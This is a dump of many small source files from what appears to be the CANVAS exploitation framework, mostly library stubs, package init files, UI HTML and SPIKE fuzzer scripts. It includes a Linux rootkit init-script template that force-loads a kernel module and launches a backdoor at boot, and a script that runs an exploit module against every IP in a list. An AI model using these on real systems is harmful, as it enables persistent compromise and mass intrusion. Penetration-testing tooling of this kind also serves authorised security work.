-------------------------------------------------------------------------------- /CANVAS_HTSRL/shellcode/clean/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2008 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | # the new school 9 | __all__ = ['windows', 'linux', 'solaris'] 10 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/Nodes/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | __all__ = [ 'NodeUtils', "javalistener", "JavaShellServer", "javaNode" ] 9 | 10 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/pysnmp/__init__.py: -------------------------------------------------------------------------------- 1 | """Pure Python SNMP toolkit module. 2 | 3 | Includes various tools for handling SNMP subset of ASN.1 data types, 4 | SNMP messages of v.1 and v.2c, and a few network transports that can 5 | be used to exchange SNMP messages with remote SNMP entities. 6 | 7 | Copyright 1999-2002 by Ilya Etingof . See LICENSE for details. 8 | """ 9 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/requestcache.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | requestcache 5 | 6 | 7 | 8 | 9 | 10 |

Request Cache

11 | ***requestcache*** 12 | 13 | 14 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/canvas.css: -------------------------------------------------------------------------------- 1 | 2 | h { 3 | font-family:arial; 4 | font-size:30px; 5 | color:black; 6 | font-weight:normal; 7 | margin-top:20px; 8 | margin-bottom:10px; 9 | display:block; 10 | } 11 | 12 | 13 | 14 | b { 15 | font-family:arial; 16 | font-size:20px; 17 | color:black; 18 | margin-top:0px; 19 | margin-bottom:10px; 20 | } 21 | 22 | br { 23 | display:block; 24 | } 25 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/MOSDEFlibc/Mach.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | from BSD import BSD42 4 | 5 | class Mach(BSD42): 6 | 7 | def __init__(self): 8 | BSD42.__init__(self) 9 | 10 | 11 | class Mach2(Mach): 12 | 13 | def __init__(self): 14 | Mach.__init__(self) 15 | 16 | 17 | class Mach3(Mach2): 18 | 19 | def __init__(self): 20 | Mach2.__init__(self) 21 | 22 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/engine/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | __all__ = ['config', "http_mosdef", "fWrap"] 9 | 10 | global CanvasConfig 11 | from config import CanvasConfig 12 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/genshi/template/tests/templates/test.html: -------------------------------------------------------------------------------- 1 | 4 | 6 | 7 | 8 | Test 9 | 10 | 11 | 12 |

Test

13 |

$message

14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/shellcode/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | __all__ = ['shellcodeGenerator', 'win32shell', 'linuxshell', 'solarisshell'] 9 | 10 | # the new school 11 | __all__ += ['clean'] 12 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/sounds/sound.cfg: -------------------------------------------------------------------------------- 1 | # Configuration file for CANVAS sound 2 | # 3 | ### Common configuration ### 4 | 5 | ### EVENTS #### 6 | # EVENT = file # 7 | # Specify the event and the filename (filename will be read from sounds/ 8 | 9 | # WELCOME MSG 10 | WELCOME=welcome.ogg 11 | 12 | # OWN is a special event, you can add as much OWN as you wish and will 13 | # be randomy played when an exploit success 14 | OWN=hgn.ogg 15 | 16 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/fuzzers/SPIKESCRIPTS/tftpd2.spk: -------------------------------------------------------------------------------- 1 | #Fuzzer for fuzzing tftp 2 | #fuzzers/spike.py -t 192.168.103.130 -s fuzzers/SPIKESCRIPTS/tftpd2.spk -P UDP -V 1:0 -p 69 3 | 4 | #0x02 is Write Request: could be a variable here to fuzz other opcodes 5 | spk.s_int(0x02, "BIGENDIANHALFWORD") 6 | spk.s_string_variable("Hello.txt") #filename 7 | spk.s_binary("00") 8 | spk.s_string_variable("octet") #mode (netascii/octet/etc) 9 | spk.s_binary("00") 10 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/fuzzers/SPIKESCRIPTS/tftpd1.spk: -------------------------------------------------------------------------------- 1 | #Fuzzer for fuzzing tftp 2 | #fuzzers/spike.py -t 192.168.24.128 -s fuzzers/SPIKESCRIPTS/tftpd1.spk -P UDP -V 0:0 -p 69 -S 0.1 3 | 4 | #0x01 is Read Request: could be a variable here to fuzz other opcodes 5 | spk.s_int(0x01, "BIGENDIANHALFWORD") 6 | spk.s_string_variable("Hello.txt") #filename 7 | spk.s_binary("00") 8 | spk.s_string_variable("octet") #mode (netascii/octet/etc) 9 | spk.s_binary("00") 10 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/topright.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | topright 5 | 6 | 7 | 8 | 9 | 10 | ***SITES*** 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/MOSDEFlibc/UnixSystemV.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | from UNIX import UNIX 9 | 10 | class UnixSystemV(UNIX): 11 | 12 | def __init__(self): 13 | UNIX.__init__(self) 14 | 15 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/shellcode/clean/windows/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2008 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | import sys 9 | if '.' not in sys.path: 10 | sys.path.append('.') 11 | 12 | # the new school 13 | __all__ = ['basecode', 'payloads'] 14 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/fuzzers/SPIKESCRIPTS/imap_ntlm.spk: -------------------------------------------------------------------------------- 1 | #imap fuzzer - first used on Mercur Imap SP4 2 | #fuzzers/spike.py -s imap_ntlm.spk -t 192.168.24.128 -p 143 -L 3 | 4 | spk.s_string("0 AUTHENTICATE NTLM\r\n") 5 | #request 6 | spk.s_string(base64.b64encode("NTLMSSP"+"A"*100)+"\r\n") 7 | spk2=spike() 8 | spk2.link(spk) 9 | parse_spk(spk2, "NTLMSSP.spk") 10 | #respond to challenge here 11 | spk.s_string(spk2.get("base64")) 12 | spk.s_string("\r\n") 13 | 14 | 15 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/titleframe.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | SPIKE Proxy UI 8 | 9 | 10 |

SPIKE Proxy Version 1.5 - Immunity, Inc.

11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/fuzzers/SPIKESCRIPTS/tftpd6.spk: -------------------------------------------------------------------------------- 1 | #Fuzzer for fuzzing tftp 2 | 3 | #0x01 is Read Request: could be a variable here to fuzz other opcodes 4 | spk.s_int(0x01, "BIGENDIANHALFWORD") 5 | spk.s_string_variable("Hello.txt") #filename 6 | spk.s_binary("00") 7 | spk.s_string_variable("octet") #mode (netascii/octet/etc) 8 | spk.s_binary("00") 9 | spk.s_string_variable("blocksize") 10 | spk.s_binary("00") 11 | spk.s_string_variable("512") 12 | spk.s_binary("00") 13 | 14 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/Plex/test_tm.py: -------------------------------------------------------------------------------- 1 | import sys 2 | sys.stderr = sys.stdout 3 | 4 | from TransitionMaps import TransitionMap 5 | 6 | m = TransitionMap() 7 | print m 8 | 9 | def add(c, s): 10 | print 11 | print "adding", repr(c), "-->", repr(s) 12 | m.add_transition(c, s) 13 | print m 14 | print "keys:", m.keys() 15 | 16 | add('a','alpha') 17 | add('e', 'eta') 18 | add('f', 'foo') 19 | add('i', 'iota') 20 | add('i', 'imp') 21 | add('eol', 'elephant') 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/Plex/LICENSE.txt: -------------------------------------------------------------------------------- 1 | Now relicened under CANVAS license for any mods copywrite Immunity, Inc. 2 | 3 | Original License: 4 | 5 | License 6 | Plex is free of any restrictions. You can use it, redistribute it, sell it, whatever you want. All I ask is that you give me credit if you distribute any code derived from it. 7 | 8 | 9 | Greg Ewing, 10 | Computer Science Department, 11 | University of Canterbury, 12 | Christchurch, 13 | New Zealand 14 | greg@cosc.canterbury.ac.nz 15 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/MOSDEFlibc/Darwin.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | from Rhapsody import RhapsodyDR2 4 | from MacOSX import MacOSX_DP2, MacOSX_DP3 5 | 6 | class Darwin0(RhapsodyDR2, MacOSX_DP2): 7 | 8 | def __init__(self, *args): 9 | RhapsodyDR2.__init__(self) 10 | MacOSX_DP2.__init__(self) 11 | 12 | 13 | class Darwin1(Darwin0, MacOSX_DP3): 14 | 15 | def __init__(self, *args): 16 | Darwin0.__init__(self) 17 | MacOSX_DP3.__init__(self) 18 | 19 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/bottomright.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | bottom 5 | 6 | 7 | 8 | 9 | 10 | 12 | Refresh
13 | ***LOGS*** 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/MOSDEFlibc/SunOS.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | from BSD import BSD43 9 | 10 | # started on 4.1BSD 11 | # SunOS 5.0 and further is Solaris 12 | 13 | class SunOS(BSD43): 14 | 15 | def __init__(self): 16 | BSD43.__init__(self) 17 | 18 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/notes.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | listenshellcodenote="This shellcode is enabled for BIND shellcode - just use a callback ip of 0.0.0.0 and it will attempt to connect to a port instead of doing a callback" 4 | nocrashrisk="There is no risk of a system or service crash from running this exploit" 5 | xporabovenote="On XP or above this exploit requires authentication. XP itself may also require that a share (any share) be open on the target (and sometimes ANY username will work - not just the correct one)" -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/MOSDEFlibc/Win32.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | from crippleC import crippleC 4 | from ANSI import ANSI 5 | 6 | class Win32(ANSI, crippleC): 7 | 8 | def __init__(self): 9 | ANSI.__init__(self) 10 | crippleC.__init__(self) 11 | 12 | # XXX hook 13 | class Win32_intel(Win32): 14 | 15 | Endianness = 'little' 16 | 17 | def __init__(self, version = None): 18 | self.version = version 19 | Win32.__init__(self) 20 | 21 | Win32_x86=Win32_intel 22 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/MOSDEFlibc/Rhapsody.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | from BSD import BSD44lite2 4 | from OPENSTEP import OPENSTEP 5 | from NetBSD import NetBSD13 6 | 7 | class RhapsodyDR1(OPENSTEP, BSD44lite2): 8 | 9 | def __init__(self, *args): 10 | OPENSTEP.__init__(self) 11 | BSD44lite2.__init__(self) 12 | 13 | 14 | class RhapsodyDR2(RhapsodyDR1, NetBSD13): 15 | 16 | def __init__(self, *args): 17 | RhapsodyDR1.__init__(self) 18 | NetBSD13.__init__(self) 19 | 20 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/Plex/Timing.py: -------------------------------------------------------------------------------- 1 | # 2 | # Get time in platform-dependent way 3 | # 4 | 5 | import os 6 | from sys import platform, exit, stderr 7 | 8 | if platform == 'mac': 9 | import MacOS 10 | def time(): 11 | return MacOS.GetTicks() / 60.0 12 | timekind = "real" 13 | elif hasattr(os, 'times'): 14 | def time(): 15 | t = os.times() 16 | return t[0] + t[1] 17 | timekind = "cpu" 18 | else: 19 | stderr.write( 20 | "Don't know how to get time on platform %s\n" % repr(platform)) 21 | exit(1) 22 | 23 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/canvaserror.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | # In which we register canvas exception types 9 | 10 | class CANVASError(Exception): 11 | pass 12 | 13 | class NodeCommandError(CANVASError): 14 | pass 15 | 16 | class NodeCommandUnimplemented(NodeCommandError): 17 | pass 18 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/osdetection/language.py: -------------------------------------------------------------------------------- 1 | class languagedetect: 2 | def __init__(self): 3 | return 4 | 5 | def run_languagedetect(self, os=None): 6 | ret = self.exploitnodes('getremotelanguage', [self.node]) 7 | self.log('LANGUAGE DETECT: Languages found: %s' % ret[0]) 8 | if os: 9 | os.languagelist = ret[0] 10 | if len(ret[0]) == 1: 11 | self.log('LANGUAGE DETECT: One language found ..') 12 | os.language = ret[0][0] 13 | return os 14 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/osdetection/telnet.py: -------------------------------------------------------------------------------- 1 | class telnetdetect: 2 | def __init__(self): 3 | return 4 | 5 | def run_telnetdetect(self): 6 | # XXX: ??? 7 | 8 | result = None 9 | 10 | banner = self.engine.getModuleExploit("telnetbanner") 11 | banner.link(self) 12 | banner.argsDict["port"] = 23 13 | 14 | result = banner.get_os() 15 | 16 | if result: 17 | self.log("TELNET DETECT: Found %s on host %s" % (result, self.host)) 18 | 19 | return result 20 | 21 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/MOSDEFlibc/ANSI.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | class ANSI: 9 | 10 | # 11 | 12 | NULL = 0 13 | 14 | # 15 | 16 | SIGINT = 2 17 | SIGILL = 4 18 | SIGABRT = 6 19 | SIGSEGV = 11 20 | SIGTERM = 15 21 | 22 | def __init__(self): 23 | pass 24 | 25 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/tlslite/utils/RC4.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | """Abstract class for RC4.""" 3 | 4 | from compat import * #For False 5 | 6 | class RC4: 7 | def __init__(self, keyBytes, implementation): 8 | if len(keyBytes) < 16 or len(keyBytes) > 256: 9 | raise ValueError() 10 | self.isBlockCipher = False 11 | self.name = "rc4" 12 | self.implementation = implementation 13 | 14 | def encrypt(self, plaintext): 15 | raise NotImplementedError() 16 | 17 | def decrypt(self, ciphertext): 18 | raise NotImplementedError() -------------------------------------------------------------------------------- /CANVAS_HTSRL/rootkits/linux/immrt: -------------------------------------------------------------------------------- 1 | #This is just a dummy script, ##modname and ##backname get replaced 2 | #! /bin/sh 3 | ### BEGIN INIT INFO 4 | ### END INIT INFO 5 | 6 | PATH=/usr/sbin:/usr/bin:/sbin:/bin 7 | 8 | . /lib/lsb/init-functions 9 | 10 | case "$1" in 11 | start) 12 | /sbin/insmod -f "/lib/modules/##modname" >/dev/null 2>&1 13 | /bin/##backname & 14 | ;; 15 | restart|reload|force-reload) 16 | echo "Error: argument '$1' not supported" >&2 17 | exit 3 18 | ;; 19 | stop) 20 | ;; 21 | *) 22 | echo "Usage: $0 start|stop" >&2 23 | exit 3 24 | ;; 25 | esac 26 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/MOSDEFlibc/NetBSD.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | # XXX incomplete... 4 | 5 | from BSD import BSD43, BSD44lite1, BSD44lite2 6 | 7 | class NetBSD0(BSD43): 8 | 9 | def __init__(self): 10 | BSD43.__init__(self) 11 | 12 | 13 | class NetBSD1(NetBSD0, BSD44lite1): 14 | 15 | def __init__(self): 16 | NetBSD0.__init__(self) 17 | BSD44lite1.__init__(self) 18 | 19 | 20 | class NetBSD13(NetBSD1, BSD44lite2): 21 | 22 | def __init__(self): 23 | NetBSD1.__init__(self) 24 | BSD44lite2.__init__(self) 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/MOSDEFlibc/GNU.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | # XXX TODO verify BSD link later... 9 | 10 | from UNIX import UNIX 11 | from BSD import BSD42 12 | 13 | class GNU(UNIX, BSD42): # formally it's not UNIX 14 | 15 | def __init__(self): 16 | UNIX.__init__(self) 17 | BSD42.__init__(self) # XXX hem... need verifications. 18 | 19 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/tlslite/integration/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | """Classes for integrating TLS Lite with other packages.""" 3 | 4 | __all__ = ["AsyncStateMachine", 5 | "HTTPTLSConnection", 6 | "POP3_TLS", 7 | "IMAP4_TLS", 8 | "SMTP_TLS", 9 | "XMLRPCTransport", 10 | "TLSSocketServerMixIn", 11 | "TLSAsyncDispatcherMixIn", 12 | "TLSTwistedProtocolWrapper"] 13 | 14 | try: 15 | import twisted 16 | del twisted 17 | except ImportError: 18 | del __all__[__all__.index("TLSTwistedProtocolWrapper")] 19 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/encoder/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | __all__ = ['addencoder', 'xorencoder', 'chunkedaddencoder','nibble_encoder'] 9 | 10 | import addencoder 11 | import nibble_encoder 12 | #import xorencoder 13 | #import chunkedaddencoder 14 | 15 | inteladdencoder = addencoder.inteladdencoder 16 | intel_nibbleencoder = nibble_encoder.intel_nibbleencoder 17 | 18 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/Crypto/Util/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | """Miscellaneous modules 3 | 4 | Contains useful modules that don't belong into any of the 5 | other Crypto.* subpackages. 6 | 7 | Crypto.Util.number Number-theoretic functions (primality testing, etc.) 8 | Crypto.Util.randpool Random number generation 9 | Crypto.Util.RFC1751 Converts between 128-bit keys and human-readable 10 | strings of words. 11 | 12 | """ 13 | 14 | __all__ = ['randpool', 'RFC1751', 'number'] 15 | 16 | __revision__ = "$Id: __init__.py,v 1.2 2006/07/29 02:52:50 phil Exp $" 17 | 18 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/internal/uniqlist.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | class uniqlist(list): 9 | def __init__(self, ilist = []): 10 | list.__init__(self, []) 11 | self.__iadd__(ilist) 12 | def __iadd__(self, tlist): 13 | for nmember in tlist: 14 | if not self.__contains__(nmember): 15 | self.append(nmember) 16 | return self 17 | 18 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/tftpy/__init__.py: -------------------------------------------------------------------------------- 1 | """This library implements the tftp protocol, based on rfc 1350. 2 | http://www.faqs.org/rfcs/rfc1350.html 3 | At the moment it implements only a client class, but will include a server, 4 | with support for variable block sizes. 5 | """ 6 | 7 | import sys 8 | 9 | # Make sure that this is at least Python 2.4 10 | verlist = sys.version_info 11 | if not verlist[0] >= 2 or not verlist[1] >= 4: 12 | raise AssertionError, "Requires at least Python 2.4" 13 | 14 | from TftpShared import * 15 | from TftpPacketTypes import * 16 | from TftpPacketFactory import * 17 | from TftpClient import * 18 | from TftpServer import * 19 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/pysnmp/error.py: -------------------------------------------------------------------------------- 1 | """ 2 | PySNMP exceptions classes. 3 | 4 | Written by Ilya Etingof , 2001, 2002. Suggested by 5 | Case Van Horsen . 6 | """ 7 | import exceptions 8 | 9 | class Generic(exceptions.Exception): 10 | """Base class for PySNMP error handlers 11 | """ 12 | def __init__(self, err_msg=None): 13 | """ 14 | """ 15 | self.err_msg = err_msg 16 | 17 | def __str__(self): 18 | """ 19 | """ 20 | return self.err_msg 21 | 22 | def __repr__(self): 23 | """ 24 | """ 25 | return self.__class__.__name__ + '(' + self.err_msg + ')' 26 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/tlslite/utils/PyCrypto_RC4.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | """PyCrypto RC4 implementation.""" 3 | 4 | from cryptomath import * 5 | from RC4 import * 6 | 7 | if pycryptoLoaded: 8 | import Crypto.Cipher.ARC4 9 | 10 | def new(key): 11 | return PyCrypto_RC4(key) 12 | 13 | class PyCrypto_RC4(RC4): 14 | 15 | def __init__(self, key): 16 | RC4.__init__(self, key, "pycrypto") 17 | self.context = Crypto.Cipher.ARC4.new(key) 18 | 19 | def encrypt(self, plaintext): 20 | return self.context.encrypt(plaintext) 21 | 22 | def decrypt(self, ciphertext): 23 | return self.context.decrypt(ciphertext) -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/riscassembler.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | """ 3 | riscassembler.py 4 | 5 | RISC assembler parent class for CANVAS's assemblers 6 | 7 | """ 8 | 9 | import mosdefutils 10 | 11 | class riscassembler: 12 | def __init__(self,procname,runpass=1): 13 | procasm = '%sassembler' % procname 14 | procasm_mod = __import__(procasm) 15 | try: 16 | getattr(procasm_mod, procasm).__init__(self) 17 | except: 18 | print "riscassembler is unable to be initialised on %s" % procname 19 | raise 20 | 21 | if __name__=="__main__": 22 | print "%s can not be called directly, but should be included as a module" % __file__ 23 | 24 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/Crypto/Util/test/prime_speed.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | import time 4 | from Crypto.Util import number 5 | 6 | # Test of prime-generation speed 7 | 8 | # This randfunc is deterministic, so we should always find the same primes. 9 | chars = ''.join(map(chr, range(255, 0, -1))) 10 | def randfunc (N): 11 | s = '' 12 | while len(s) 2 | 3 | 4 | 5 | 6 | 7 | index 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/yahoo/search/version.py: -------------------------------------------------------------------------------- 1 | """ yahoo.search.version - Version information 2 | """ 3 | 4 | version = "3.1" 5 | authorName = "Leif Hedstrom" 6 | authorMail = "leif@ogre.com" 7 | maintainerName = "Leif Hedstrom" 8 | maintainerMail = "leif@ogre.com" 9 | credits = """- The entire Yahoo search team, of course. 10 | """ 11 | 12 | author = "%s <%s>" % (authorName, authorMail) 13 | 14 | 15 | __revision__ = "$Id: version.py,v 1.13 2007/09/11 21:49:48 zwoop Exp $" 16 | __version__ = "$Revision: 1.13 $" 17 | __author__ = "Leif Hedstrom " 18 | __date__ = "Tue Sep 11 15:49:27 MDT 2007" 19 | 20 | 21 | 22 | # 23 | # local variables: 24 | # mode: python 25 | # indent-tabs-mode: nil 26 | # py-indent-offset: 4 27 | # end: 28 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/extras/do_all_ips.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Do all ips loads a file and runs a module on that file 4 | 5 | Here's one easy way to get your file, if you have an nmap greppable database 6 | sitting around (example is a user targeting ftpd): 7 | grep 21/open *_nmap.txt | awk {'print $2'} > allftpd.txt 8 | extras/do_all_ips.py alldb.txt ftpd_check 9 | """ 10 | 11 | import os,sys 12 | ips=file(sys.argv[1],"rb").readlines() 13 | modulename=sys.argv[2] 14 | if len(sys.argv)>2: 15 | args=" ".join(sys.argv[3:]) 16 | else: 17 | args="" 18 | 19 | for ip in ips: 20 | ip=ip.strip() 21 | command="python exploits/%s/%s.py -t %s %s"%(modulename,modulename,ip,args) 22 | print "Command: %s"%command 23 | os.system(command) -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | __all__ = [ 9 | 'tlslite', 10 | 'Crypto', 11 | 'crippled_des', 12 | 'ctelnetlib', 13 | 'daveutil', 14 | 'dcemarshall', 15 | 'dnslookup', 16 | 'mssql', 17 | 'mysql_test', 18 | 'mysqllib', 19 | 'ndmp', 20 | 'requestandresponse', 21 | 'rfb', 22 | 'spikeProxyUI', 23 | 'spkproxy', 24 | 'tidllex', 25 | 'tidlparse', 26 | 'tnslib', 27 | 'wuftplib', 28 | 'genshi', 29 | 'cdns', 30 | ] 31 | 32 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/backdoors/mosdef_callbacks/utils.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define ISMOD(val, mod) ((val) % (mod) == ((mod) - 1)) 4 | #if defined(__i386__) || defined(WINDOWS) || defined(__CYGWIN__) || defined(WIN32) 5 | # define LINERETPAD 8 6 | #else 7 | # define VALPAD 4 8 | # define LINERETPAD 16 9 | #endif 10 | 11 | void 12 | bufferdump(void *buffer, size_t count) 13 | { 14 | int i; 15 | unsigned char *p = buffer; 16 | 17 | for (i=0; i prompts 19 | self.localPrompt = self.prompt 20 | if hasattr(self, 'uid') and self.uid == 0: 21 | power = '#' 22 | #return self.localPrompt + power + ' ' 23 | return self.localPrompt + power 24 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/filesystem.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Filesystem.py 5 | 6 | Useful utilities for browsing around the filesystem 7 | """ 8 | 9 | import os 10 | 11 | def lsdashr(basedir,excludelist=[]): 12 | """ 13 | emulates ls -r 14 | """ 15 | ret=[] #files returned 16 | dirs=[basedir] #directories returned 17 | files=os.listdir(basedir) 18 | for file in files: 19 | if file in excludelist: 20 | continue 21 | name=os.path.join(basedir,file) 22 | #print "Found %s:"%name 23 | if os.path.basename(name) in excludelist: 24 | continue 25 | if os.path.isdir(name): 26 | nret,ndirs=lsdashr(name,excludelist) 27 | ret+=nret 28 | dirs+=ndirs 29 | else: 30 | ret+=[name] 31 | return ret,dirs 32 | 33 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/left.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | left 5 | 6 | 7 | 8 | 9 | 10 | 11 |

UI Options

12 |

request cache

13 |

Help

14 |

Stop All Actions 15 |

Allow actions again. 16 |

Configure SPIKE Proxy 17 |

Start Post Captures 18 |

